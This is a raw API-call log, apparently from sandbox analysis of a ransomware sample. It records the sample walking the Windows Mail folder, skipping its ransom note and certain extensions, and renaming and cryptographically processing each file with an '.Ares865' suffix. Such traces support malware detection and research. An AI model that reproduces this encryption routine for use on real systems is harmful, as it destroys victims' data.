[0122.862] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Mail\\wab.exe.Ares865") returned 51 [0122.862] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Mail\\wab.exe" (normalized: "c:\\program files (x86)\\windows mail\\wab.exe"), lpNewFileName="C:\\Program Files (x86)\\Windows Mail\\wab.exe.Ares865" (normalized: "c:\\program files (x86)\\windows mail\\wab.exe.ares865"), dwFlags=0x1) returned 1 [0122.864] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Mail\\wab.exe.Ares865" (normalized: "c:\\program files (x86)\\windows mail\\wab.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0122.864] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=516096) returned 1 [0122.864] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0122.865] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0122.865] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0122.865] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0122.867] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0122.867] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.867] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e300, lpName=0x0) returned 0x170 [0122.869] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e300) returned 0x420000 [0122.891] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0122.892] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0122.892] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.892] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0122.892] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0122.892] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0122.892] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0122.892] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0122.892] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0122.892] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0122.892] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0122.892] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0122.893] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0122.893] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0122.897] CloseHandle (hObject=0x170) returned 1 [0122.897] CloseHandle (hObject=0x118) returned 1 [0122.897] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0122.897] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0122.897] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0122.900] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a77900b, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x8a77900b, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0xb04ef6b0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x8200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wabfind.dll", cAlternateFileName="")) returned 1 [0122.900] lstrcmpiW (lpString1="wabfind.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0122.900] lstrcmpiW (lpString1="wabfind.dll", lpString2="aoldtz.exe") returned 1 [0122.900] lstrcpyW (in: lpString1=0x2cce448, lpString2="wabfind.dll" | out: lpString1="wabfind.dll") returned="wabfind.dll" [0122.900] lstrlenW (lpString="wabfind.dll") returned 11 [0122.900] lstrlenW (lpString="Ares865") returned 7 [0122.900] lstrcmpiW (lpString1="ind.dll", lpString2="Ares865") returned 1 [0122.900] lstrlenW (lpString=".dll") returned 4 [0122.900] lstrcmpiW (lpString1="wabfind.dll", lpString2=".dll") returned 1 [0122.900] lstrlenW (lpString=".lnk") returned 4 [0122.900] lstrcmpiW (lpString1="wabfind.dll", lpString2=".lnk") returned 1 [0122.900] lstrlenW (lpString=".ini") returned 4 [0122.900] lstrcmpiW (lpString1="wabfind.dll", lpString2=".ini") returned 1 [0122.901] lstrlenW (lpString=".sys") returned 4 [0122.901] lstrcmpiW (lpString1="wabfind.dll", lpString2=".sys") returned 1 [0122.901] lstrlenW (lpString="wabfind.dll") returned 11 [0122.901] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Mail\\wabfind.dll.Ares865") returned 55 [0122.901] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Mail\\wabfind.dll" (normalized: "c:\\program files (x86)\\windows mail\\wabfind.dll"), lpNewFileName="C:\\Program Files (x86)\\Windows Mail\\wabfind.dll.Ares865" (normalized: "c:\\program files (x86)\\windows mail\\wabfind.dll.ares865"), dwFlags=0x1) returned 1 [0122.903] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Mail\\wabfind.dll.Ares865" (normalized: "c:\\program files (x86)\\windows mail\\wabfind.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0122.903] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=33280) returned 1 [0122.903] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0122.904] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0122.904] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0122.904] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0122.905] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0122.905] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.905] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8500, lpName=0x0) returned 0x170 [0122.906] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8500) returned 0x190000 [0122.909] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0122.909] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0122.909] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.910] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0122.910] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0122.910] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0122.910] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0122.910] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0122.910] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0122.910] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0122.910] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0122.910] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0122.910] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0122.910] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0122.911] CloseHandle (hObject=0x170) returned 1 [0122.911] CloseHandle (hObject=0x118) returned 1 [0122.911] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0122.911] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0122.911] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0122.911] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a1aba92, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x8a1aba92, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0xb05167b0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wabimp.dll", cAlternateFileName="")) returned 1 [0122.911] lstrcmpiW (lpString1="wabimp.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0122.911] lstrcmpiW (lpString1="wabimp.dll", lpString2="aoldtz.exe") returned 1 [0122.911] lstrcpyW (in: lpString1=0x2cce448, lpString2="wabimp.dll" | out: lpString1="wabimp.dll") returned="wabimp.dll" [0122.911] lstrlenW (lpString="wabimp.dll") returned 10 [0122.911] lstrlenW (lpString="Ares865") returned 7 [0122.911] lstrcmpiW (lpString1="imp.dll", lpString2="Ares865") returned 1 [0122.911] lstrlenW (lpString=".dll") returned 4 [0122.912] lstrcmpiW (lpString1="wabimp.dll", lpString2=".dll") returned 1 [0122.912] lstrlenW (lpString=".lnk") returned 4 [0122.912] lstrcmpiW (lpString1="wabimp.dll", lpString2=".lnk") returned 1 [0122.912] lstrlenW (lpString=".ini") returned 4 [0122.912] lstrcmpiW (lpString1="wabimp.dll", lpString2=".ini") returned 1 [0122.912] lstrlenW (lpString=".sys") returned 4 [0122.912] lstrcmpiW (lpString1="wabimp.dll", lpString2=".sys") returned 1 [0122.912] lstrlenW (lpString="wabimp.dll") returned 10 [0122.912] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Mail\\wabimp.dll.Ares865") returned 54 [0122.912] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Mail\\wabimp.dll" (normalized: "c:\\program files (x86)\\windows mail\\wabimp.dll"), lpNewFileName="C:\\Program Files (x86)\\Windows Mail\\wabimp.dll.Ares865" (normalized: "c:\\program files (x86)\\windows mail\\wabimp.dll.ares865"), dwFlags=0x1) returned 1 [0122.914] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Mail\\wabimp.dll.Ares865" (normalized: "c:\\program files (x86)\\windows mail\\wabimp.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0122.914] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=41984) returned 1 [0122.914] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0122.914] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0122.914] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0122.914] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0122.915] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0122.915] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.915] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa700, lpName=0x0) returned 0x170 [0122.917] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa700) returned 0x190000 [0122.920] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0122.920] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0122.920] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.920] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0122.920] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0122.920] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0122.921] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0122.921] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0122.921] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0122.921] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0122.921] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0122.921] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0122.921] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0122.921] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0122.921] CloseHandle (hObject=0x170) returned 1 [0122.921] CloseHandle (hObject=0x118) returned 1 [0122.922] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0122.922] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0122.922] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0122.923] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c2b2af4, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x8c2b2af4, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x78aae250, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wabmig.exe", cAlternateFileName="")) returned 1 [0122.923] lstrcmpiW (lpString1="wabmig.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0122.923] lstrcmpiW (lpString1="wabmig.exe", lpString2="aoldtz.exe") returned 1 [0122.923] lstrcpyW (in: lpString1=0x2cce448, lpString2="wabmig.exe" | out: lpString1="wabmig.exe") returned="wabmig.exe" [0122.923] lstrlenW (lpString="wabmig.exe") returned 10 [0122.923] lstrlenW (lpString="Ares865") returned 7 [0122.923] lstrcmpiW (lpString1="mig.exe", lpString2="Ares865") returned 1 [0122.923] lstrlenW (lpString=".dll") returned 4 [0122.923] lstrcmpiW (lpString1="wabmig.exe", lpString2=".dll") returned 1 [0122.923] lstrlenW (lpString=".lnk") returned 4 [0122.923] lstrcmpiW (lpString1="wabmig.exe", lpString2=".lnk") returned 1 [0122.923] lstrlenW (lpString=".ini") returned 4 [0122.923] lstrcmpiW (lpString1="wabmig.exe", lpString2=".ini") returned 1 [0122.923] lstrlenW (lpString=".sys") returned 4 [0122.923] lstrcmpiW (lpString1="wabmig.exe", lpString2=".sys") returned 1 [0122.923] lstrlenW (lpString="wabmig.exe") returned 10 [0122.924] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Mail\\wabmig.exe.Ares865") returned 54 [0122.924] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Mail\\wabmig.exe" (normalized: "c:\\program files (x86)\\windows mail\\wabmig.exe"), lpNewFileName="C:\\Program Files (x86)\\Windows Mail\\wabmig.exe.Ares865" (normalized: "c:\\program files (x86)\\windows mail\\wabmig.exe.ares865"), dwFlags=0x1) returned 1 [0122.925] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Mail\\wabmig.exe.Ares865" (normalized: "c:\\program files (x86)\\windows mail\\wabmig.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0122.925] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65536) returned 1 [0122.926] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0122.926] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0122.926] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0122.926] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0122.927] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0122.927] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.927] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10300, lpName=0x0) returned 0x170 [0122.928] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10300) returned 0x190000 [0122.932] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0122.933] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0122.933] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.933] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0122.933] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0122.933] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0122.933] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0122.933] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0122.933] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0122.933] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0122.933] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0122.934] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0122.934] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0122.934] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0122.934] CloseHandle (hObject=0x170) returned 1 [0122.934] CloseHandle (hObject=0x118) returned 1 [0122.934] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0122.934] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0122.934] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0122.935] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8e771d9d, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x8e771d9d, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x796bc150, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x60e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WinMail.exe", cAlternateFileName="")) returned 1 [0122.935] lstrcmpiW (lpString1="WinMail.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0122.935] lstrcmpiW (lpString1="WinMail.exe", lpString2="aoldtz.exe") returned 1 [0122.935] lstrcpyW (in: lpString1=0x2cce448, lpString2="WinMail.exe" | out: lpString1="WinMail.exe") returned="WinMail.exe" [0122.935] lstrlenW (lpString="WinMail.exe") returned 11 [0122.935] lstrlenW (lpString="Ares865") returned 7 [0122.935] lstrcmpiW (lpString1="ail.exe", lpString2="Ares865") returned -1 [0122.935] lstrlenW (lpString=".dll") returned 4 [0122.935] lstrcmpiW (lpString1="WinMail.exe", lpString2=".dll") returned 1 [0122.935] lstrlenW (lpString=".lnk") returned 4 [0122.935] lstrcmpiW (lpString1="WinMail.exe", lpString2=".lnk") returned 1 [0122.935] lstrlenW (lpString=".ini") returned 4 [0122.935] lstrcmpiW (lpString1="WinMail.exe", lpString2=".ini") returned 1 [0122.935] lstrlenW (lpString=".sys") returned 4 [0122.936] lstrcmpiW (lpString1="WinMail.exe", lpString2=".sys") returned 1 [0122.936] lstrlenW (lpString="WinMail.exe") returned 11 [0122.936] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Mail\\WinMail.exe.Ares865") returned 55 [0122.936] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Mail\\WinMail.exe" (normalized: "c:\\program files (x86)\\windows mail\\winmail.exe"), lpNewFileName="C:\\Program Files (x86)\\Windows Mail\\WinMail.exe.Ares865" (normalized: "c:\\program files (x86)\\windows mail\\winmail.exe.ares865"), dwFlags=0x1) returned 1 [0122.938] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Mail\\WinMail.exe.Ares865" (normalized: "c:\\program files (x86)\\windows mail\\winmail.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0122.938] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=396800) returned 1 [0122.938] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0122.938] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0122.938] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0122.938] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0122.939] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0122.939] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.939] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x61100, lpName=0x0) returned 0x170 [0122.940] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x61100) returned 0x420000 [0122.960] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0122.960] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0122.961] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.961] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0122.961] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0122.961] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0122.961] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0122.961] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0122.961] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0122.961] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0122.961] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0122.961] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0122.961] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0122.961] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0122.965] CloseHandle (hObject=0x170) returned 1 [0122.965] CloseHandle (hObject=0x118) returned 1 [0122.965] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0122.965] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0122.965] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0122.967] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8e771d9d, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x8e771d9d, ftLastAccessTime.dwHighDateTime=0x1ca0413, 